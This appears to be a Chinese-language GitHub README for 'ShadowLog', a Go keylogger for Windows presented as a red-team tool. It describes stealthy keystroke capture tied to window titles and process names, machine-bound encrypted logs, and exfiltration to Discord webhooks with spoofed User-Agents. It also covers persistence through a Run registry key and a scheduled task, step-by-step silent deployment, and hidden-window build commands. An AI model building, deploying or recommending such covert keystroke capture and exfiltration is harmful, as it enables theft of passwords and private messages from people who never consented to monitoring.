BGx-11/ShadowLog

GitHub: BGx-11/ShadowLog

一款面向 Windows 平台的高隐蔽性键盘监控框架，结合硬件绑定加密和上下文感知捕获能力，为红队评估和安全研究提供了完整的击键记录与数据渗出方案。

Stars: 0 | Forks: 0

# Shadow Log：隐蔽活动分析 ![Go](https://img.shields.io/badge/Language-Go-00ADD8?style=for-the-badge&logo=go&logoColor=white) ![Platform](https://img.shields.io/badge/Platform-Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white) ![Build](https://img.shields.io/badge/Build-Optimized-success?style=for-the-badge) Shadow Log 是一个高性能的原生系统监控框架，专为高级网络安全研究和授权安全演示而设计。它完全使用 Go 语言构建，具有零运行时依赖的特点，为企业级的隐蔽活动捕获和安全数据渗出提供了解决方案。 ## 技术特性 ### 🛡️ 高级隐蔽性与 OPSEC - **统一身份**：系统在所有遥测数据、注册表项和计划任务中均标识为 **`Shadow Log`**，以实现透明的系统管理。 - **注意**：在安装或卸载期间，终端可能会短暂闪烁。这是系统服务注册的正常行为。 ### 🌐 通用精准捕获 - **国际化键盘支持**：利用 Windows `ToUnicode` API 确保在所有区域实现 100% 的准确率，正确捕获符号、重音字符和上档字符。 - **上下文感知元数据**：每个捕获的事件都会自动与前台 `ProcessID`、应用程序名称和活动窗口标题进行关联。 - **零延迟性能**：实现了活动窗口句柄缓存；系统仅在前台窗口实际发生变化时才查询进程元数据，将 API 调用和 CPU 开销降至可忽略的水平。 ### 🔐 硬件绑定安全 - **机器绑定加密**：日志使用 **AES-256-GCM** 进行加密。加密密钥从主机唯一的 `MachineGuid` 动态派生，这意味着如果渗出数据被转移到没有原始 GUID 的其他系统上，将失去取证价值。 - **异步渗出**：健壮的缓冲工作池通过 Discord Webhooks 处理日志传输，具有伪装的浏览器 User-Agents 和智能的网络重试逻辑。 ## 🚀 部署指南 ### 选项 1：快速开始（安全分析师）如果您是一名分析师，且不希望从源代码编译，请从项目根目录下载最新的 **`ShadowLog_Release.zip`**。 1. **解压**：在主机上解压该压缩包。 2. **初始化**：以管理员身份运行 `ShadowLog.exe` 以启动设置向导。 - *注意：在注册 hooks 时，终端窗口可能会闪烁几次。* 3. **配置**：输入您的 Discord Webhook URL，然后点击 **Test Connection**。这是接收您唯一的 **Machine GUID** 所必需的步骤，您稍后需要它来解密日志。 4. **部署**：点击 **Initialize Monitor**。服务将初始化并作为 `Shadow Log` 静默运行。 ### 选项 2：从源代码编译（开发者） ### 前置条件 - **Go 1.21+**：编译所需。 - **Windows 10/11**：原生 hooks 的目标环境。 - **管理员权限**：在初始化阶段注册系统 hooks 所需。 ### 编译使用以下命令生成经过优化的、剥离符号表的二进制文件： ``` # 构建 Core Monitor 与设置 go build -ldflags "-H=windowsgui -s -w" -o ShadowLog.exe main.go # 构建 Forensic Decryptor go build -ldflags "-H=windowsgui -s -w" -o Decryptor.exe decryptor/main.go # 构建 System Uninstaller go build -ldflags "-H=windowsgui -s -w" -o Uninstaller.exe uninstaller/main.go ``` ## 取证重建 1. **恢复**：在主机上运行 `Decryptor.exe`。 2. **解密**：输入在测试脉冲发送期间获得的唯一 **Machine GUID**，以重建并读取本地加密日志。 3. **卸载**：运行 `Uninstaller.exe` 以清除所有进程、注册表项、计划任务和取证系统痕迹。 ## 系统规格 - **服务名称**：`Shadow Log` - **互斥体 ID**：`Shadow_Log_Sync` - **注册表项**：`HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Shadow Log` - **计划任务**：`Shadow Log Reporting` - **加密标准**：AES-256-GCM（设备绑定）

**Devansh Agarwal (BGx)** *网络安全专业学生 & 学生开发者* [作品集：iambgx.in](https://iambgx.in)

标签：AES-256-GCM, DAST, Discord机器人, EVTX分析, Golang, OPSEC, ToUnicode, Webhook, Windows平台, 上下文感知, 事件捕获, 企业级安全, 力导向图, 威胁情报, 安全编程, 定时任务, 开发者工具, 异常检测, 恶意软件分析, 数据加密, 数据窃取, 日志审计, 注册表, 监控软件, 硬件绑定, 系统服务, 系统监视, 网络安全, 网络安全演练, 远程管理, 钩子技术, 键盘记录器, 隐私保护, 隐蔽监控, 零依赖